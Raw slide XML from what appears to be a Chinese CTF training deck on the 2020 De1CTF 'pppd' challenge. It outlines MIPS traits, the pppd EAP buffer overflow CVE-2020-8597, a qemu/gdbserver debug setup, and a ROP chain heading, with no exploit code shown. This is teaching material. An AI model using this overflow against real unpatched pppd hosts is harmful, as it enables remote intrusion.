              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>流水线特点（执行跳转、函数调用时，下一条指令也同时执行）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无直接操作栈的指令（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RISC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>精简指令集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3570605" y="1005205"/>
            <a:ext cx="5427345" cy="2592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78359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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>考点：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. nday CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞分析和利用；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指令集栈溢出漏洞的调试和利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603192" y="1300065"/>
            <a:ext cx="4215130" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2020 De1ctf - pppd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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CVE-2020-8597</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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eap_request、eap_response 函数均受影响</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PPP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>EAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>缓冲区溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527550" y="1402080"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5358130" y="1186180"/>
            <a:ext cx="2458085" cy="1356995"/>
            <a:chOff x="7011" y="4332"/>
            <a:chExt cx="3871" cy="2137"/>
          </a:xfrm>
        </p:grpSpPr>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203" y="4672"/>
              <a:ext cx="3679" cy="495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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flipH="1">
              <a:off x="7011" y="5315"/>
              <a:ext cx="3693" cy="495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="图片 10"/>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202" y="5981"/>
              <a:ext cx="3612" cy="488"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="组合 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7717" y="4332"/>
              <a:ext cx="2751" cy="1840"/>
              <a:chOff x="7717" y="4332"/>
              <a:chExt cx="2751" cy="1840"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="文本框 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7717" y="4332"/>
                <a:ext cx="2652" cy="580"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:p>
                <a:pPr indent="0">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1F2A66"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  ppp request</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F2A66"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="文本框 9"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7717" y="5012"/>
                <a:ext cx="2652" cy="580"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:p>
                <a:pPr indent="0">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1F2A66"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  ppp response</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F2A66"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="文本框 11"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7816" y="5592"/>
                <a:ext cx="2652" cy="580"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:p>
                <a:pPr indent="0">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1F2A66"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> send eap payload</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F2A66"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7703185" y="839470"/>
            <a:ext cx="1496060" cy="1813560"/>
            <a:chOff x="12144" y="3794"/>
            <a:chExt cx="2356" cy="2856"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="图片 1"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12158" y="4490"/>
              <a:ext cx="2160" cy="2160"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12144" y="3794"/>
              <a:ext cx="2356" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr indent="0">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ppp daemon</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18"/>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69240" y="2433320"/>
            <a:ext cx="5374640" cy="2351405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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5868670" y="3592195"/>
            <a:ext cx="3215005" cy="849630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5263515" y="3751580"/>
            <a:ext cx="727710" cy="6330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Debug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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qemu-system-mips ... -net user,hostfwd=tcp::1234-:1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-net nic -serial stdio -serial pty</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行串口通信</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086860" y="3668395"/>
            <a:ext cx="4817745" cy="481965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="图片1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843905" y="3422650"/>
            <a:ext cx="1197610" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6955155" y="3668395"/>
            <a:ext cx="1070610" cy="306705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>/dev/ttyS1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005705" y="3668395"/>
            <a:ext cx="1070610" cy="306705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>pts/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3749675" y="3528695"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8226425" y="3528695"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3812540" y="4481195"/>
            <a:ext cx="951865" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宿主机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8270240" y="4481195"/>
            <a:ext cx="951865" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>虚拟机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8270240" y="2665730"/>
            <a:ext cx="952500" cy="1002665"/>
            <a:chOff x="13024" y="4198"/>
            <a:chExt cx="1500" cy="1579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="图片 29"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13024" y="4443"/>
              <a:ext cx="1334" cy="1334"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="文本框 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13026" y="4198"/>
              <a:ext cx="1499" cy="434"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
                <a:t>gdbserver</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"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Debug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5093970" y="917575"/>
            <a:ext cx="3763645" cy="3995420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="56515" y="204470"/>
            <a:ext cx="4892675" cy="4641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漏洞利用</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ROP chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
